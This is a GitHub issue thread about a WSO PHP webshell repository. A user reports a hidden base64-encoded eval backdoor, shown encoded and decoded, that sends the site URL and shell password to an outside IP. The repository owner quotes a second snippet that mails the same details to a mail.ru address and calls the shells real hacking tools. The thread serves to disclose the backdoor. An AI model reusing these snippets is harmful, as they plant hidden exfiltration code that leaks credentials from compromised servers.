### ISSUE TITLE
shells are backdoored 

### ISSUE THREAD

**Issue by ghost** [Josexv1/wso-webshell#1]
I was checking the webshells out and noticed this git repo.
https://github.com/Josexv1/wso-webshell/blob/master/wso_404.php

on line 426
eval(base64_decode("JHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiR0YXJnZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsNCmZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vMTg1LjYxLjEzOC4xNTcvZ2V0LnBocD91cmw9eyR0YXJnZXR9JnB3PXskYXV0aF9wYXNzfSIpOw=="));

after decoding:
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
file_get_contents("http://185.61.138.157/get.php?url={$target}&pw={$auth_pass}");

WTF. LOL. reported to @trustedsec

**Comment by Josexv1** [comment]
Yes, they are, the original version of the webshells have a watch shell script. Remember this is webshell was not intented to be a file manager, it is a real world hacking tool. @i95swervin 

Also the IP is not pointing to any service, so that piece is not working.

**Comment by Josexv1** [comment]
As you can see in the wso.php it has this piece of code.
```
//--------------Watching webshell!--------------
if(array_key_exists('watching',$_POST)){
$tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'root', $tmp); // Edit or delete!
}
```
It will send an email to the email of your choice when the file gets executed for the first time.

**Comment by ghost** [comment]
I know what a shell is and what its intended uses are for. I would suggest editing the backdoors out of the php code.
